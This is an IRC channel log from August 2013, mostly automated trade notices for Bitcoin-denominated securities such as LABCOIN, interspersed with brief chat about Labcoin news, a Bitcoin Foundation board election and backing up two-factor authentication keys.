[LABCOIN] 500 @ 0.001798 = 0.899 BTC [+] Aug 19 19:56:26 [BTCTC] [LABCOIN] 400 @ 0.001798 = 0.7192 BTC [+] Aug 19 19:56:40 [BTCTC] [ACTIVEMINING] 2 @ 0.005441 = 0.0109 BTC [-] Aug 19 19:56:49 [BTCTC] [LABCOIN] 5 @ 0.001799 = 0.009 BTC [+] Aug 19 19:56:50 [BTCTC] [LABCOIN] 50 @ 0.001799 = 0.09 BTC [+] Aug 19 19:56:51 [BTCTC] [LABCOIN] 1000 @ 0.0018 = 1.8 BTC [+] Aug 19 19:56:53 Do it Aug 19 19:57:05 [MPEX] [S.MPOE] 6550 @ 0.00084047 = 5.5051 BTC [+] Aug 19 19:57:09 [MPEX] [S.MPOE] 321 @ 0.00084049 = 0.2698 BTC [+] Aug 19 19:57:29 [BTCTC] [LABCOIN] 200 @ 0.0018 = 0.36 BTC [+] Aug 19 19:58:38 [BTCTC] [LABCOIN] 1800 @ 0.0018 = 3.24 BTC [+] Aug 19 19:58:39 [BTCTC] [LABCOIN] 3200 @ 0.0018 = 5.76 BTC [+] Aug 19 19:59:05 [BTCTC] [LABCOIN] 6 @ 0.0018 = 0.0108 BTC [+] Aug 19 19:59:37 [HAVELOCK] [HIM] 3 @ 0.205 = 0.615 BTC [+] Aug 19 19:59:40 [BTCTC] [LABCOIN] 624 @ 0.0018 = 1.1232 BTC [+] Aug 19 19:59:41 [BTCTC] [LABCOIN] 200 @ 0.0018 = 0.36 BTC [+] Aug 19 19:59:42 [BTCTC] [LABCOIN] 976 @ 0.0018 = 1.7568 BTC [+] Aug 19 20:00:04 [BTCTC] [LABCOIN] 200 @ 0.0018 = 0.36 BTC [+] Aug 19 20:00:24 Alot of activity for nothing Aug 19 20:00:34 o wait Aug 19 20:01:01 [MPEX] [S.MPOE] 7807 @ 0.00084049 = 6.5617 BTC [+] Aug 19 20:01:40 [BTCTC] [DMS.MINING] 32 @ 0.00325 = 0.104 BTC [-] Aug 19 20:02:16 [BTCTC] [LABCOIN] 8824 @ 0.0018 = 15.8832 BTC [+] Aug 19 20:02:18 [BTCTC] [LABCOIN] 100 @ 0.0018 = 0.18 BTC [+] Aug 19 20:02:21 [BTCTC] [LABCOIN] 3461 @ 0.0018 = 6.2298 BTC [+] Aug 19 20:02:22 [BTCTC] [LABCOIN] 1 @ 0.001801 BTC [+] Aug 19 20:02:23 [BTCTC] [LABCOIN] 10 @ 0.001803 = 0.018 BTC [+] Aug 19 20:02:24 [BTCTC] [LABCOIN] 36 @ 0.00181 = 0.0652 BTC [+] Aug 19 20:02:26 [BTCTC] [LABCOIN] 181 @ 0.001821 = 0.3296 BTC [+] Aug 19 20:02:27 [BTCTC] [LABCOIN] 50 @ 0.001824 = 0.0912 BTC [+] Aug 19 20:02:27 [BTCTC] [LABCOIN] 1482 @ 0.001831 = 2.7135 BTC [+] Aug 19 20:02:28 [BTCTC] [LABCOIN] 9 @ 0.00185 = 0.0167 BTC [+] Aug 19 20:02:29 [BTCTC] [LABCOIN] 490 @ 0.00185 = 0.9065 BTC [+] Aug 19 20:02:30 [BTCTC] [LABCOIN] 30 @ 0.00185 = 0.0555 BTC [+] Aug 19 20:02:32 [BTCTC] [LABCOIN] 6 @ 0.00185 = 0.0111 BTC [+] Aug 19 20:02:33 [BTCTC] [LABCOIN] 60 @ 0.001865 = 0.1119 BTC [+] Aug 19 20:02:34 [BTCTC] [LABCOIN] 10000 @ 0.001866 = 18.66 BTC [+] Aug 19 20:02:35 [BTCTC] [LABCOIN] 295 @ 0.001866 = 0.5505 BTC [+] Aug 19 20:03:35 [BTCTC] [LABCOIN] 1000 @ 0.001876 = 1.876 BTC [+] Aug 19 20:04:12 [BTCTC] [LABCOIN] 500 @ 0.001876 = 0.938 BTC [+] Aug 19 20:05:30 [BTCTC] [LABCOIN] 1119 @ 0.001876 = 2.0992 BTC [+] Aug 19 20:05:31 [BTCTC] [LABCOIN] 1000 @ 0.001877 = 1.877 BTC [+] Aug 19 20:05:32 [BTCTC] [LABCOIN] 2000 @ 0.001878 = 3.756 BTC [+] Aug 19 20:06:51 [BTCTC] [LABCOIN] 50 @ 0.001891 = 0.0946 BTC [+] Aug 19 20:06:53 [BTCTC] [LABCOIN] 40 @ 0.001899 = 0.076 BTC [+] Aug 19 20:06:55 [BTCTC] [LABCOIN] 35 @ 0.001899 = 0.0665 BTC [+] Aug 19 20:07:51 [BTCTC] [LABCOIN] 1965 @ 0.001899 = 3.7315 BTC [+] Aug 19 20:08:29 [BTCTC] [LABCOIN] 30 @ 0.0019 = 0.057 BTC [+] Aug 19 20:08:32 [BTCTC] [LABCOIN] 2970 @ 0.0019 = 5.643 BTC [+] Aug 19 20:08:35 [BTCTC] [LABCOIN] 30 @ 0.0019 = 0.057 BTC [+] Aug 19 20:08:57 [BTCTC] [LABCOIN] 100 @ 0.0019 = 0.19 BTC [+] Aug 19 20:09:05 [BTCTC] [LABCOIN] 2000 @ 0.0019 = 3.8 BTC [+] Aug 19 20:09:33 [BTCTC] [LABCOIN] 100 @ 0.0019 = 0.19 BTC [+] Aug 19 20:09:40 First time in a while, I've seen the bid higher than the ask on labcoin Aug 19 20:10:11 [BTCTC] [LABCOIN] 35 @ 0.0019 = 0.0665 BTC [+] Aug 19 20:10:25 [BTCTC] [LABCOIN] 3744 @ 0.0019 = 7.1136 BTC [+] Aug 19 20:10:26 [BTCTC] [LABCOIN] 11 @ 0.0019 = 0.0209 BTC [+] Aug 19 20:10:28 [BTCTC] [LABCOIN] 214 @ 0.0019 = 0.4066 BTC [+] Aug 19 20:10:29 [BTCTC] [LABCOIN] 6031 @ 0.001901 = 11.4649 BTC [+] Aug 19 20:10:40 [BTCTC] [NASTY-PT] 34 @ 0.0033 = 0.1122 BTC [-] Aug 19 20:10:54 [BTCTC] [B.YABMC] 1 @ 0.0025 BTC [-] Aug 19 20:10:57 [BTCTC] [ASICMINER-PT] 1 @ 3.721 BTC [-] Aug 19 20:10:59 [BTCTC] [LABCOIN] 2000 @ 0.001901 = 3.802 BTC [+] Aug 19 20:11:39 [HAVELOCK] [SMG] 3 @ 0.00025 = 0.0008 BTC [-] Aug 19 20:11:42 [BTCTC] [LABCOIN] 120 @ 0.001901 = 0.2281 BTC [+] Aug 19 20:11:43 [BTCTC] [LABCOIN] 1700 @ 0.001901 = 3.2317 BTC [+] Aug 19 20:11:46 [BTCTC] [LABCOIN] 149 @ 0.001901 = 0.2832 BTC [+] Aug 19 20:11:48 [BTCTC] [LABCOIN] 50 @ 0.001915 = 0.0958 BTC [+] Aug 19 20:11:49 [BTCTC] [LABCOIN] 1801 @ 0.00192 = 3.4579 BTC [+] Aug 19 20:12:44 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.001098 = 0.011 BTC [-] Aug 19 20:13:06 [HAVELOCK] [HIM] 5 @ 0.206 = 1.03 BTC [+] Aug 19 20:13:14 [HAVELOCK] [HIM] 10 @ 0.208599 = 2.086 BTC [+] Aug 19 20:14:03 [BTCTC] [ACTIVEMINING] 30 @ 0.005386 = 0.1616 BTC [-] Aug 19 20:14:04 [HAVELOCK] [HIM] 1 @ 0.20899998 BTC [+] Aug 19 20:14:19 [HAVELOCK] [HIM] 10 @ 0.20899999 = 2.09 BTC [+] Aug 19 20:14:43 [HAVELOCK] [HIM] 1 @ 0.20899999 BTC [+] Aug 19 20:14:52 [BTCTC] [ACTIVEMINING] 68 @ 0.005386 = 0.3662 BTC [-] Aug 19 20:14:53 [BTCTC] [ACTIVEMINING] 50 @ 0.005385 = 0.2693 BTC [-] Aug 19 20:14:55 [BTCTC] [ACTIVEMINING] 4 @ 0.005351 = 0.0214 BTC [-] Aug 19 20:14:56 [BTCTC] [ACTIVEMINING] 20 @ 0.00535 = 0.107 BTC [-] Aug 19 20:14:57 [BTCTC] [ACTIVEMINING] 108 @ 0.005346 = 0.5774 BTC [-] Aug 19 20:14:58 [BTCTC] [ACTIVEMINING] 50 @ 0.005345 = 0.2673 BTC [-] Aug 19 20:15:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.03701 BTC [-] Aug 19 20:15:22 [BTCTC] [ACTIVEMINING] 30 @ 0.005346 = 0.1604 BTC [+] Aug 19 20:15:24 [BTCTC] [ACTIVEMINING] 68 @ 0.005346 = 0.3635 BTC [+] Aug 19 20:15:25 [BTCTC] [ACTIVEMINING] 493 @ 0.005345 = 2.6351 BTC [-] Aug 19 20:15:25 [BTCTC] [ACTIVEMINING] 6 @ 0.005203 = 0.0312 BTC [-] Aug 19 20:15:26 [BTCTC] [ACTIVEMINING] 31 @ 0.005202 = 0.1613 BTC [-] Aug 19 20:15:28 [BTCTC] [ACTIVEMINING] 432 @ 0.005192 = 2.2429 BTC [-] Aug 19 20:15:29 [BTCTC] [ACTIVEMINING] 2 @ 0.00519 = 0.0104 BTC [-] Aug 19 20:15:30 [BTCTC] [ACTIVEMINING] 1063 @ 0.005127 = 5.45 BTC [-] Aug 19 20:15:40 [BTCTC] [LABCOIN] 834 @ 0.00192 = 1.6013 BTC [+] Aug 19 20:16:25 [BTCTC] [ASICMINER-PT] 1 @ 3.72 BTC [-] Aug 19 20:16:27 [BTCTC] [ASICMINER-PT] 1 @ 3.706 BTC [-] Aug 19 20:16:29 [BTCTC] [NASTY-PT] 1 @ 0.0033 BTC [-] Aug 19 20:16:31 [BTCTC] [LABCOIN] 90 @ 0.00192 = 0.1728 BTC [+] Aug 19 20:17:19 [BTCTC] [DMS.MINING] 15 @ 0.00325 = 0.0488 BTC [-] Aug 19 20:17:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.03701 BTC [-] Aug 19 20:18:01 [BTCTC] [B.YABMC] 19 @ 0.001622 = 0.0308 BTC [-] Aug 19 20:18:54 [BTCTC] [DMS.MINING] 10 @ 0.00325 = 0.0325 BTC [-] Aug 19 20:20:17 [BTCTC] [ACTIVEMINING] 30 @ 0.005146 = 0.1544 BTC [+] Aug 19 20:21:23 [BTCTC] [DMS.MINING] 92 @ 0.00325 = 0.299 BTC [-] Aug 19 20:21:33 [BTCTC] [ACTIVEMINING] 68 @ 0.005149 = 0.3501 BTC [+] Aug 19 20:21:34 [BTCTC] [ACTIVEMINING] 2 @ 0.005145 = 0.0103 BTC [-] Aug 19 20:22:09 [BTCTC] [LABCOIN] 16 @ 0.00192 = 0.0307 BTC [+] Aug 19 20:22:54 [BTCTC] [LABCOIN] 2259 @ 0.00192 = 4.3373 BTC [+] Aug 19 20:23:54 [BTCTC] [ACTIVEMINING] 50 @ 0.005151 = 0.2576 BTC [+] Aug 19 20:23:59 [BTCTC] [LABCOIN] 12 @ 0.001922 = 0.0231 BTC [+] Aug 19 20:24:00 [BTCTC] [LABCOIN] 200 @ 0.001923 = 0.3846 BTC [+] Aug 19 20:24:08 [BTCTC] [TAT.ASICMINER] 2 @ 0.03709 = 0.0742 BTC [+] Aug 19 20:24:37 [BTCTC] [LABCOIN] 98 @ 0.001925 = 0.1887 BTC [+] Aug 19 20:24:49 [BTCTC] [LABCOIN] 16 @ 0.00192 = 0.0307 BTC [-] Aug 19 20:25:01 [BTCTC] [LABCOIN] 98 @ 0.00192 = 0.1882 BTC [-] Aug 19 20:25:02 [BTCTC] [LABCOIN] 22 @ 0.001925 = 0.0424 BTC [+] Aug 19 20:26:13 [BTCTC] [LABCOIN] 8746 @ 0.001925 = 16.8361 BTC [+] Aug 19 20:26:16 [BTCTC] [LABCOIN] 1000 @ 0.001932 = 1.932 BTC [+] Aug 19 20:26:17 [BTCTC] [LABCOIN] 25 @ 0.00195 = 0.0488 BTC [+] Aug 19 20:26:18 [BTCTC] [LABCOIN] 1000 @ 0.00195 = 1.95 BTC [+] Aug 19 20:26:26 [HAVELOCK] [LABCO] 7 @ 0.001823 = 0.0128 BTC [+] Aug 19 20:26:29 [BTCTC] [LABCOIN] 500 @ 0.00195 = 0.975 BTC [+] Aug 19 20:26:30 [BTCTC] [LABCOIN] 50 @ 0.001951 = 0.0976 BTC [+] Aug 19 20:26:31 [BTCTC] [LABCOIN] 250 @ 0.001969 = 0.4923 BTC [+] Aug 19 20:26:32 [BTCTC] [LABCOIN] 50 @ 0.001969 = 0.0985 BTC [+] Aug 19 20:26:33 [BTCTC] [LABCOIN] 1000 @ 0.00197 = 1.97 BTC [+] Aug 19 20:26:34 [BTCTC] [LABCOIN] 3000 @ 0.00197 = 5.91 BTC [+] Aug 19 20:26:36 [BTCTC] [LABCOIN] 8088 @ 0.001975 = 15.9738 BTC [+] Aug 19 20:26:37 [BTCTC] [LABCOIN] 30 @ 0.001976 = 0.0593 BTC [+] Aug 19 20:26:49 [BTCTC] [LABCOIN] 3800 @ 0.001978 = 7.5164 BTC [+] Aug 19 20:26:51 [BTCTC] [LABCOIN] 135 @ 0.001991 = 0.2688 BTC [+] Aug 19 20:26:53 [BTCTC] [LABCOIN] 5000 @ 0.001997 = 9.985 BTC [+] Aug 19 20:26:53 [BTCTC] [LABCOIN] 2000 @ 0.001998 = 3.996 BTC [+] Aug 19 20:26:54 [BTCTC] [LABCOIN] 1000 @ 0.001999 = 1.999 BTC [+] Aug 19 20:26:55 [BTCTC] [LABCOIN] 2000 @ 0.002 = 4 BTC [+] Aug 19 20:26:56 [BTCTC] [LABCOIN] 2805 @ 0.002 = 5.61 BTC [+] Aug 19 20:26:58 [BTCTC] [BASIC-MINING] 2 @ 0.278 = 0.556 BTC [-] Aug 19 20:26:59 [BTCTC] [BASIC-MINING] 1 @ 0.278 BTC [-] Aug 19 20:27:11 [BTCTC] [BTC-GROWTH] 4 @ 0.0962 = 0.3848 BTC [-] Aug 19 20:27:27 [MPEX] [S.MPOE] 3022 @ 0.00084049 = 2.54 BTC [+] Aug 19 20:27:31 [BTCTC] [ASICMINER-PT] 1 @ 3.703 BTC [-] Aug 19 20:27:33 [HAVELOCK] [LABCO] 4 @ 0.00189 = 0.0076 BTC [+] Aug 19 20:27:38 [BTCTC] [LABCOIN] 300 @ 0.002 = 0.6 BTC [+] Aug 19 20:28:26 [BTCTC] [ASICMINER-PT] 1 @ 3.701 BTC [-] Aug 19 20:28:38 [HAVELOCK] [LABCO] 4 @ 0.00189 = 0.0076 BTC [+] Aug 19 20:28:41 [BTCTC] [LABCOIN] 235 @ 0.002 = 0.47 BTC [+] Aug 19 20:28:48 [HAVELOCK] [LABCO] 1 @ 0.00189 BTC [+] Aug 19 20:29:00 [BTCTC] [LABCOIN] 1660 @ 0.002 = 3.32 BTC [+] Aug 19 20:29:01 [BTCTC] [LABCOIN] 1550 @ 0.002 = 3.1 BTC [+] Aug 19 20:29:02 [BTCTC] [LABCOIN] 790 @ 0.002 = 1.58 BTC [+] Aug 19 20:29:36 [BTCTC] [LABCOIN] 10000 @ 0.002 = 20 BTC [+] Aug 19 20:29:48 [BTCTC] [LABCOIN] 190 @ 0.002 = 0.38 BTC [+] Aug 19 20:29:50 [BTCTC] [LABCOIN] 123 @ 0.002 = 0.246 BTC [+] Aug 19 20:30:23 [BTCTC] [LABCOIN] 800 @ 0.002 = 1.6 BTC [+] Aug 19 20:30:38 [BTCTC] [LABCOIN] 1760 @ 0.002 = 3.52 BTC [+] Aug 19 20:31:22 [BTCTC] [CB.IDIFF-O] 25 @ 0.00975 = 0.2438 BTC [+] Aug 19 20:31:30 [BTCTC] [LABCOIN] 200 @ 0.002 = 0.4 BTC [+] Aug 19 20:31:33 [BTCTC] [LABCOIN] 5000 @ 0.002 = 10 BTC [+] Aug 19 20:31:42 [BTCTC] [CB.IDIFF-O] 27 @ 0.00975 = 0.2633 BTC [+] Aug 19 20:31:45 [BTCTC] [LABCOIN] 1137 @ 0.002 = 2.274 BTC [+] Aug 19 20:31:46 [BTCTC] [LABCOIN] 100 @ 0.002 = 0.2 BTC [+] Aug 19 20:31:57 [BTCTC] [LABCOIN] 1263 @ 0.002 = 2.526 BTC [+] Aug 19 20:32:08 [BTCTC] [LABCOIN] 5000 @ 0.002 = 10 BTC [+] Aug 19 20:32:11 [BTCTC] [LABCOIN] 250 @ 0.002 = 0.5 BTC [+] Aug 19 20:33:01 [BTCTC] [LABCOIN] 1000 @ 0.002 = 2 BTC [+] Aug 19 20:33:15 [BTCTC] [LABCOIN] 201 @ 0.002 = 0.402 BTC [+] Aug 19 20:33:23 DeadTerra, hows the icemachine Aug 19 20:33:30 [HAVELOCK] [HIM] 15 @ 0.20899998 = 3.135 BTC [-] Aug 19 20:33:55 [BTCTC] [LABCOIN] 1000 @ 0.002 = 2 BTC [+] Aug 19 20:34:04 Makes me think of Futurama Aug 19 20:34:26 [BTCTC] [LABCOIN] 2 @ 0.001999 = 0.004 BTC [-] Aug 19 20:34:27 [BTCTC] [LABCOIN] 198 @ 0.002 = 0.396 BTC [+] Aug 19 20:34:55 [BTCTC] [LABCOIN] 100 @ 0.002 = 0.2 BTC [+] Aug 19 20:35:03 [BTCTC] [LABCOIN] 988 @ 0.002 = 1.976 BTC [+] Aug 19 20:35:36 [BTCTC] [LABCOIN] 10 @ 0.0021 = 0.021 BTC [+] Aug 19 20:35:37 [BTCTC] [LABCOIN] 100 @ 0.0021 = 0.21 BTC [+] Aug 19 20:35:39 [BTCTC] [LABCOIN] 3662 @ 0.0021 = 7.6902 BTC [+] Aug 19 20:35:52 [BTCTC] [BASIC-MINING] 4 @ 0.2778 = 1.1112 BTC [-] Aug 19 20:35:53 [BTCTC] [BASIC-MINING] 3 @ 0.2777 = 0.8331 BTC [-] Aug 19 20:37:17 [BTCTC] [ASICMINER-PT] 1 @ 3.702 BTC [+] Aug 19 20:37:19 [BTCTC] [ASICMINER-PT] 2 @ 3.701 = 7.402 BTC [-] Aug 19 20:37:20 [BTCTC] [ASICMINER-PT] 2 @ 3.7 = 7.4 BTC [-] Aug 19 20:37:36 [HAVELOCK] [CFIG] 30 @ 0.15 = 4.5 BTC Aug 19 20:37:48 [BTCTC] [LABCOIN] 10000 @ 0.0021 = 21 BTC [+] Aug 19 20:39:00 [HAVELOCK] [XBOND] 90 @ 0.001177 = 0.1059 BTC [+] Aug 19 20:39:03 [BTCTC] [LABCOIN] 100 @ 0.0021 = 0.21 BTC [+] Aug 19 20:39:20 [BTCTC] [LABCOIN] 2500 @ 0.0021 = 5.25 BTC [+] Aug 19 20:39:39 [BTCTC] [LABCOIN] 20105 @ 0.0021 = 42.2205 BTC [+] Aug 19 20:40:05 [BTCTC] [LABCOIN] 95 @ 0.002148 = 0.2041 BTC [+] Aug 19 20:40:28 http://bcoinnews.com/2013/08/19/labcoin-updates-from-theswede75/ Aug 19 20:40:37 [BTCTC] [LABCOIN] 305 @ 0.00215 = 0.6558 BTC [+] Aug 19 20:40:38 yes yes Aug 19 20:40:50 for all the people that don't want to go to the forum Aug 19 20:40:59 [BTCTC] [LABCOIN] 1545 @ 0.00215 = 3.3218 BTC [+] Aug 19 20:41:00 [BTCTC] [LABCOIN] 50 @ 0.00215 = 0.1075 BTC [+] Aug 19 20:41:00 [BTCTC] [LABCOIN] 3000 @ 0.002198 = 6.594 BTC [+] Aug 19 20:41:02 [BTCTC] [LABCOIN] 4405 @ 0.0022 = 9.691 BTC [+] Aug 19 20:41:16 MAKE THEM COINS! Aug 19 20:41:30 [BTCTC] [BTC-BOND] 2 @ 0.009996 = 0.02 BTC [+] Aug 19 20:41:57 [BTCTC] [LABCOIN] 50 @ 0.0022 = 0.11 BTC [+] Aug 19 20:42:19 [BTCTC] [ACTIVEMINING] 30 @ 0.005174 = 0.1552 BTC [+] Aug 19 20:43:15 [BTCTC] [BTC-GROWTH] 4 @ 0.0998 = 0.3992 BTC [+] Aug 19 20:43:16 [BTCTC] [BTC-GROWTH] 25 @ 0.1 = 2.5 BTC [+] Aug 19 20:43:44 [BTCTC] [ACTIVEMINING] 30 @ 0.005174 = 0.1552 BTC [+] Aug 19 20:44:02 [BTCTC] [LTC-ATF.B2] 1 @ 0.0104 BTC [-] Aug 19 20:44:18 [BTCTC] [ASICMINER-PT] 3 @ 3.7 = 11.1 BTC [-] Aug 19 20:44:46 [BTCTC] [LABCOIN] 5000 @ 0.0022 = 11 BTC [+] Aug 19 20:44:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.03709 BTC [+] Aug 19 20:45:45 [BTCTC] [LABCOIN] 50 @ 0.0022 = 0.11 BTC [+] Aug 19 20:46:01 [BTCTC] [ASICMINER-PT] 1 @ 3.691 BTC [-] Aug 19 20:46:04 [BTCTC] [LABCOIN] 4000 @ 0.0022 = 8.8 BTC [+] Aug 19 20:46:43 [BTCTC] [LABCOIN] 15000 @ 0.0022 = 33 BTC [+] Aug 19 20:46:44 [BTCTC] [LABCOIN] 748 @ 0.0022 = 1.6456 BTC [+] Aug 19 20:46:46 [BTCTC] [LABCOIN] 20 @ 0.0022 = 0.044 BTC [+] Aug 19 20:46:47 [BTCTC] [LABCOIN] 250 @ 0.0022 = 0.55 BTC [+] Aug 19 20:47:19 [BTCTC] [LABCOIN] 17 @ 0.00224 = 0.0381 BTC [+] Aug 19 20:47:20 [BTCTC] [LABCOIN] 283 @ 0.00226 = 0.6396 BTC [+] Aug 19 20:47:51 [BTCTC] [LABCOIN] 300 @ 0.00226 = 0.678 BTC [+] Aug 19 20:48:31 [BTCTC] [LABCOIN] 900 @ 0.00226 = 2.034 BTC [+] Aug 19 20:48:38 [BTCTC] [LABCOIN] 50 @ 0.00226 = 0.113 BTC [+] Aug 19 20:48:40 [BTCTC] [LABCOIN] 49 @ 0.00226 = 0.1107 BTC [+] Aug 19 20:48:52 [BTCTC] [LABCOIN] 100 @ 0.00226 = 0.226 BTC [+] Aug 19 20:49:23 [BTCTC] [NASTY-PT] 12 @ 0.0033 = 0.0396 BTC [-] Aug 19 20:49:25 [BTCTC] [LABCOIN] 50 @ 0.00226 = 0.113 BTC [+] Aug 19 20:49:47 [BTCTC] [LABCOIN] 15 @ 0.00226 = 0.0339 BTC [+] Aug 19 20:50:05 [BTCTC] [LABCOIN] 140 @ 0.00226 = 0.3164 BTC [+] Aug 19 20:50:18 [BTCTC] [LABCOIN] 13 @ 0.00226 = 0.0294 BTC [+] Aug 19 20:50:21 [BTCTC] [DMS.MINING] 36 @ 0.0033 = 0.1188 BTC [+] Aug 19 20:50:43 [HAVELOCK] [LABCO] 25 @ 0.001889 = 0.0472 BTC [-] Aug 19 20:51:10 [BTCTC] [LABCOIN] 2 @ 0.00226 = 0.0045 BTC [+] Aug 19 20:51:17 [BTCTC] [LABCOIN] 50 @ 0.00226 = 0.113 BTC [+] Aug 19 20:51:19 [BTCTC] [BTC-GROWTH] 35 @ 0.0955 = 3.3425 BTC [-] Aug 19 20:51:38 [BTCTC] [TAT.ASICMINER] 21 @ 0.03701 = 0.7772 BTC [-] Aug 19 20:51:40 [BTCTC] [TAT.ASICMINER] 14 @ 0.03701 = 0.5181 BTC [-] Aug 19 20:51:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.037 BTC [-] Aug 19 20:51:42 [BTCTC] [TAT.ASICMINER] 39 @ 0.037 = 1.443 BTC [-] Aug 19 20:52:00 omg labcoin. Aug 19 20:52:15 [BTCTC] [LABCOIN] 795 @ 0.00226 = 1.7967 BTC [+] Aug 19 20:52:17 [BTCTC] [LABCOIN] 405 @ 0.002289 = 0.927 BTC [+] Aug 19 20:52:44 [BTCTC] [LABCOIN] 19 @ 0.002289 = 0.0435 BTC [+] Aug 19 20:53:04 [BTCTC] [LABCOIN] 20 @ 0.002289 = 0.0458 BTC [+] Aug 19 20:53:08 https://bitcointalk.org/index.php?topic=277035.msg2964861#msg2964861 Aug 19 20:53:12 what stupidity is this Aug 19 20:53:14 [DISCUSS]Luke-Jr is standing for election to the board of the Bitcoin Foundation Aug 19 20:53:14 [BTCTC] [LABCOIN] 900 @ 0.002289 = 2.0601 BTC [+] Aug 19 20:53:29 [BTCTC] [LABCOIN] 74 @ 0.002289 = 0.1694 BTC [+] Aug 19 20:53:30 [BTCTC] [LABCOIN] 50 @ 0.00231 = 0.1155 BTC [+] Aug 19 20:53:32 [BTCTC] [LABCOIN] 2076 @ 0.00238 = 4.9409 BTC [+] Aug 19 20:53:38 lulz Aug 19 20:53:44 [HAVELOCK] [HIM] 10 @ 0.20899998 = 2.09 BTC [-] Aug 19 20:54:11 :( Aug 19 20:54:17 [BTCTC] [LABCOIN] 10 @ 0.00238 = 0.0238 BTC [+] Aug 19 20:54:45 [BTCTC] [LABCOIN] 56 @ 0.00238 = 0.1333 BTC [+] Aug 19 20:54:59 [BTCTC] [LABCOIN] 50 @ 0.00238 = 0.119 BTC [+] Aug 19 20:55:06 [BTCTC] [LABCOIN] 500 @ 0.00238 = 1.19 BTC [+] Aug 19 20:55:16 [BTCTC] [LABCOIN] 2090 @ 0.00238 = 4.9742 BTC [+] Aug 19 20:55:19 [BTCTC] [LABCOIN] 10 @ 0.00238 = 0.0238 BTC [+] Aug 19 20:55:56 [BTCTC] [TAT.ASICMINER] 45 @ 0.037 = 1.665 BTC [-] Aug 19 20:55:57 [BTCTC] [TAT.ASICMINER] 100 @ 0.0369 = 3.69 BTC [-] Aug 19 20:55:59 [BTCTC] [TAT.ASICMINER] 7 @ 0.0369 = 0.2583 BTC [-] Aug 19 20:56:00 [BTCTC] [TAT.ASICMINER] 20 @ 0.0368 = 0.736 BTC [-] Aug 19 20:56:01 [BTCTC] [TAT.ASICMINER] 20 @ 0.0367 = 0.734 BTC [-] Aug 19 20:56:02 [BTCTC] [TAT.ASICMINER] 3 @ 0.0366 = 0.1098 BTC [-] Aug 19 20:56:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.03654 BTC [-] Aug 19 20:56:05 [BTCTC] [TAT.ASICMINER] 4 @ 0.03652 = 0.1461 BTC [-] Aug 19 20:56:20 [HAVELOCK] [LABCO] 1523 @ 0.00188 = 2.8632 BTC [-] Aug 19 20:56:31 [BTCTC] [LABCOIN] 10 @ 0.00238 = 0.0238 BTC [+] Aug 19 20:56:45 [BTCTC] [ACTIVEMINING] 10 @ 0.005179 = 0.0518 BTC [+] Aug 19 20:56:47 [BTCTC] [ACTIVEMINING] 40 @ 0.005178 = 0.2071 BTC [-] Aug 19 20:56:49 [BTCTC] [BASIC-MINING] 4 @ 0.2777 = 1.1108 BTC [-] Aug 19 20:56:50 [BTCTC] [BASIC-MINING] 10 @ 0.2776 = 2.776 BTC [-] Aug 19 20:56:52 [BTCTC] [LABCOIN] 198 @ 0.00238 = 0.4712 BTC [+] Aug 19 20:56:54 [BTCTC] [LABCOIN] 500 @ 0.0024 = 1.2 BTC [+] Aug 19 20:56:56 [BTCTC] [LABCOIN] 1019 @ 0.002444 = 2.4904 BTC [+] Aug 19 20:56:57 [BTCTC] [LABCOIN] 1383 @ 0.002444 = 3.3801 BTC [+] Aug 19 20:57:40 [BTCTC] [LABCOIN] 10 @ 0.002444 = 0.0244 BTC [+] Aug 19 20:57:43 [BTCTC] [HOSTED-MINING] 1 @ 0.28 BTC [+] Aug 19 20:57:58 [BTCTC] [LABCOIN] 1500 @ 0.002444 = 3.666 BTC [+] Aug 19 20:58:35 [HAVELOCK] [LABCO] 135 @ 0.00189 = 0.2552 BTC [+] Aug 19 20:58:59 is there a way to extract google auth secret keys or do i have to turn 2fa off and on again and save the qr picture? (in case of btct for example) Aug 19 20:59:03 Well, there goes the neighborhood. Aug 19 20:59:07 [BTCTC] [LABCOIN] 4 @ 0.0024 = 0.0096 BTC [-] Aug 19 20:59:12 [BTCTC] [LABCOIN] 100 @ 0.0024 = 0.24 BTC [-] Aug 19 20:59:16 If he gets voted in, the whole place goes to shit Aug 19 20:59:39 [BTCTC] [LABCOIN] 10 @ 0.0024 = 0.024 BTC [-] Aug 19 21:00:17 If who gets voted in? Aug 19 21:00:22 [BTCTC] [LABCOIN] 80 @ 0.0024 = 0.192 BTC [-] Aug 19 21:00:24 [BTCTC] [ASICMINER-PT] 1 @ 3.69 BTC [-] Aug 19 21:00:49 [BTCTC] [LABCOIN] 6 @ 0.0024 = 0.0144 BTC [-] Aug 19 21:00:55 [BTCTC] [LABCOIN] 107 @ 0.002444 = 0.2615 BTC [+] Aug 19 21:00:58 [BTCTC] [LABCOIN] 100 @ 0.00245 = 0.245 BTC [+] Aug 19 21:01:00 [BTCTC] [LABCOIN] 5000 @ 0.00246 = 12.3 BTC [+] Aug 19 21:01:02 [BTCTC] [LABCOIN] 7000 @ 0.002496 = 17.472 BTC [+] Aug 19 21:01:02 https://bitcointalk.org/index.php?topic=277035.msg2964861#msg2964861 Aug 19 21:01:03 [BTCTC] [LABCOIN] 1787 @ 0.002497 = 4.4621 BTC [+] Aug 19 21:01:04 [BTCTC] [ASICMINER-PT] 2 @ 3.69 = 7.38 BTC [-] Aug 19 21:01:06 [DISCUSS]Luke-Jr is standing for election to the board of the Bitcoin Foundation Aug 19 21:01:45 [BTCTC] [LABCOIN] 1900 @ 0.002497 = 4.7443 BTC [+] Aug 19 21:02:11 [BTCTC] [LABCOIN] 23 @ 0.002497 = 0.0574 BTC [+] Aug 19 21:02:25 [BTCTC] [LABCOIN] 190 @ 0.002498 = 0.4746 BTC [+] Aug 19 21:02:26 [BTCTC] [LABCOIN] 3000 @ 0.002498 = 7.494 BTC [+] Aug 19 21:02:28 [BTCTC] [LABCOIN] 2000 @ 0.002498 = 4.996 BTC [+] Aug 19 21:02:28 haw haw haw haw haw Aug 19 21:02:55 [BTCTC] [LABCOIN] 6 @ 0.002499 = 0.015 BTC [+] Aug 19 21:03:19 I'll buy membership to vote no. Aug 19 21:03:28 [BTCTC] [LABCOIN] 3 @ 0.002499 = 0.0075 BTC [+] Aug 19 21:03:41 [BTCTC] [LABCOIN] 1 @ 0.002499 BTC [+] Aug 19 21:03:44 [BTCTC] [LABCOIN] 200 @ 0.002499 = 0.4998 BTC [+] Aug 19 21:03:46 